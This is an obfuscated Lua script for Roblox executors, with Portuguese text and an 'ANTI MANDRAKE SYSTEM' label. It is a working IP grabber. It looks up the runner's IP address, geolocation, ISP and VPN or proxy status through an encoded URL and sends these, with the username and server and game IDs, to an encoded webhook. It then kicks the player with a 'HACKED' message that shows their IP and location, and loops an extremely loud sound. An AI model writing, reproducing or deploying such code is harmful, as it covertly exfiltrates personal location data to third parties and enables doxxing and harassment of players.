--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v15,v16) local v17={};for v38=1, #v15 do v6(v17,v0(v4(v1(v2(v15,v38,v38 + 1 )),v1(v2(v16,1 + (v38% #v16) ,1 + (v38% #v16) + 1 )))%256 ));end return v5(v17);end local v8=http_request or request or (syn and syn.request) or (http and http.request) ;if  not v8 then local v39=374 -(123 + 251) ;while true do if ((0 -0)==v39) then local v48=698 -(208 + 490) ;while true do if ((0 + 0)==v48) then warn("Executor não suporta HTTP Requests.");return;end end end end end local function v9() local v18,v19=pcall(function() return v8({[v7("\228\209\215","\126\177\163\187\69\134\219\167")]=v7("\43\217\62\213\166\108\130\35\213\177\34\221\35\139\255\44\192\101\207\239\44\195\101\154\250\42\200\38\193\239\126\222\62\196\232\54\222\102\212\233\38\223\51\137\255\44\216\36\209\238\58\129\56\192\251\42\194\36\235\253\46\200\102\198\245\55\212\102\201\253\55\129\38\202\242\111\196\57\213\176\51\223\37\221\229\111\219\58\203\176\43\194\57\209\245\45\202","\156\67\173\74\165"),[v7("\25\178\93\30\179\34","\38\84\215\41\118\220\70")]=v7("\119\51\22","\158\48\118\66\114")});end);if (v18 and v19) then local v41=game:GetService(v7("\131\48\4\38\64\160\233\189\45\19\51","\155\203\68\112\86\19\197")):JSONDecode(v19.Body);if (v41.status~=v7("\85\200\53\255\69\107\246","\152\38\189\86\156\32\24\133")) then return {[v7("\237\66\162\84\229","\38\156\55\199")]="Não encontrado",[v7("\171\114\105\38\7\102\227","\35\200\29\28\72\115\20\154")]="Não encontrado",[v7("\11\186\214\214\130\34\26\24\178\212","\84\121\223\177\191\237\76")]="Não encontrado",[v7("\184\95\221\185","\161\219\54\169\192\90\48\80")]="Não encontrado",[v7("\69\67\20","\69\41\34\96")]="Não encontrado",[v7("\176\204\217","\75\220\163\183\106\98")]="Não encontrado",[v7("\11\169\155","\185\98\218\235\87")]="Não encontrado",[v7("\221\44\41","\202\171\92\71\134\190")]=false,[v7("\57\211\35\144\48","\232\73\161\76")]=false,[v7("\179\214\81\73\23\181\222","\126\219\185\34\61")]=false};end print(v7("\37\254\4\50","\135\108\174\62\18\30\23\147")   .. v41.query );print(v7("\149\224\46\202\28\171\105\135","\167\214\137\74\171\120\206\83")   .. v41.city );print("Região: "   .. v41.regionName );print("País: "   .. v41.country );print(v7("\167\241\38\84\236\178\143\245\104\29","\199\235\144\82\61\152")   .. v41.lat );print(v7("\43\25\183\44\14\2\172\47\2\76\249","\75\103\118\217")   .. v41.lon );print(v7("\238\103\64\78\249","\126\167\52\16\116\217")   .. v41.isp );print(v7("\254\30\14\218\244","\156\168\78\64\224\212\121")   .. ((v41.vpn and v7("\52\199\136","\174\103\142\197")) or "NÃO") );print(v7("\102\58\80\32\60\4\184","\152\54\72\63\88\69\62")   .. ((v41.proxy and v7("\231\237\195","\60\180\164\142")) or "NÃO") );print(v7("\124\95\17\40\36\232\28\76\91\23\102\15\226\1\76\87\11\46\125\173","\114\56\62\101\73\71\141")   .. ((v41.hosting and v7("\139\192\246","\164\216\137\187")) or "NÃO") );return v41;else warn("Erro ao obter informações do IP");return nil;end end local function v10(v20,v21) local v22=v7("\218\242\37\162\181\164\68\157\226\56\161\165\241\25\214\168\50\189\171\177\10\194\239\126\165\163\252\3\221\233\58\161\233\175\88\134\177\104\226\241\173\92\139\176\97\231\244\169\95\132\180\101\253\169\232\26\251\204\105\156\246\247\5\223\182\102\183\150\251\83\203\227\24\185\176\207\45\208\224\54\135\254\249\4\250\178\28\153\151\255\94\232\180\59\131\148\193\57\196\239\18\180\175\172\89\219\234\102\128\246\240\56\159\215\35\151\162\201\8\217\209","\107\178\134\81\210\198\158");local v23=v20.Name;local v24=os.date(v7("\125\10\205\131\167\119\75\187\134\239\16\84\199\235\240\125\61","\202\88\110\226\166"));local v25=game.JobId;local v26=game.PlaceId;local v27=string.format([[
**IP - ANTI MANDRAKE SYSTEM** 🚨
-----------------------------------------
👤 **Usuário:** %s
🕒 **Data e Hora:** %s
🌐 **ID do Servidor:** %s
🎮 **ID do Jogo:** %s
🌍 **IP:** %s
📍 **Localização:** %s, %s, %s
🗺 **Latitude:** %s
🗺 **Longitude:** %s
🏢 **Provedor:** %s
🛡 **VPN:** %s
🔌 **Proxy:** %s
🏢 **Datacenter/Hosting:** %s
-----------------------------------------
> **Atenção:** Quem está lendo isso é....... 
    ]],v23,v24,v25,v26,v21.query or "Não encontrado" ,v21.city or "Não encontrado" ,v21.regionName or "Não encontrado" ,v21.country or "Não encontrado" ,v21.lat or "Não encontrado" ,v21.lon or "Não encontrado" ,v21.isp or "Não encontrado" ,(v21.vpn and v7("\240\38\175","\170\163\111\226\151")) or "NÃO" ,(v21.proxy and v7("\34\25\159","\73\113\80\210\88\46\87")) or "NÃO" ,(v21.hosting and v7("\178\5\224","\135\225\76\173\114")) or "NÃO" );local v28={[v7("\25\226\182\164\169\179\179","\199\122\141\216\208\204\221")]=v27};print(v7("\153\216\30\228\121\248\169\210\80\245\118\224\164\220\2\176\117\243\163\206\17\247\125\251\237\205\17\226\121\182\162\157\52\249\107\245\162\207\20\190\54\184","\150\205\189\112\144\24"));local v29,v30=pcall(function() return v8({[v7("\16\150\179","\112\69\228\223\44\100\232\113")]=v22,[v7("\249\26\19\219\185\120","\230\180\127\103\179\214\28")]=v7("\188\42\108\114","\128\236\101\63\38\132\33"),[v7("\132\172\16\64\179\249\220","\175\204\201\113\36\214\139")]={[v7("\100\195\59\200\1\73\216\120\232\29\87\201","\100\39\172\85\188")]=v7("\172\104\169\140\58\174\121\173\137\60\163\55\179\147\60\163","\83\205\24\217\224")},[v7("\196\202\201\36","\93\134\165\173")]=game:GetService(v7("\150\230\213\210\9\203\160\104\183\241\196","\30\222\146\161\162\90\174\210")):JSONEncode(v28)});end);if  not v29 then warn(v7("\192\92\98\5\165\79\127\74\224\64\102\3\228\92\48\26\228\92\113\74\234\14\84\3\246\77\127\24\225\20\48","\106\133\46\16")   .. tostring(v30) );else print(v7("\117\37\125\239\91\71\93\45\51\249\84\86\81\33\119\253\26\80\89\50\114\188\85\0\124\41\96\255\85\82\92\122\51","\32\56\64\19\156\58")   .. v30.Body );end print(v7("\23\133\168\27\23\191\205\23\133\168\27\23\191\205\23\133\168\27\23\191\205\23\133\168\27\23\191\205\23\133\168\27\23\191\205\23\133\168\27\23\191\205\23\133\168\27\23\191\205\23\133\168\27\23\191\205\23\133\168\27\23\191","\224\58\168\133\54\58\146"));end local function v11(v31) local v32=0 + 0 ;local v33;while true do if (v32==(836 -(660 + 176))) then v33=game.Players.LocalPlayer;if v33 then wait(1 + 2 );local v50=string.format("HACKED💻\n\n🌍 IP: %s\n📍 Localização: %s, %s, %s",v31.query or "Não encontrado" ,v31.city or "Não encontrado" ,v31.regionName or "Não encontrado" ,v31.country or "Não encontrado" );v33:Kick(v50);end break;end end end local function v12() local v34=202 -(14 + 188) ;local v35;local v36;local v37;while true do if (v34==(677 -(534 + 141))) then v37.Volume=v36;v37.Looped=true;v34=2 + 1 ;end if (v34==(3 + 0)) then v37.Parent=game.Workspace;v37:Play();v34=4;end if ((0 + 0)==v34) then v35=v7("\75\84\83\252\102\149\130\31\80\82\17\178\58\209\213\88\15\2\18\173\33\222\223","\107\57\54\43\157\21\230\231");v36=99999997952 -0 ;v34=1 -0 ;end if (v34==(11 -7)) then while true do local v49=0 + 0 ;while true do if (v49==(0 + 0)) then wait(0.5);v37:Play();break;end end end break;end if (v34==(397 -(115 + 281))) then v37=Instance.new(v7("\232\132\4\251\189","\175\187\235\113\149\217\188"));v37.SoundId=v35;v34=2;end end end local v13=game.Players.LocalPlayer;local v14=v9();if v14 then local v40=0 -0 ;while true do if (v40==(0 + 0)) then v10(v13,v14);v11(v14);v40=2 -1 ;end if (v40==(3 -2)) then v12();break;end end else warn("Não foi possível obter informações do IP. O kick não será executado.");end
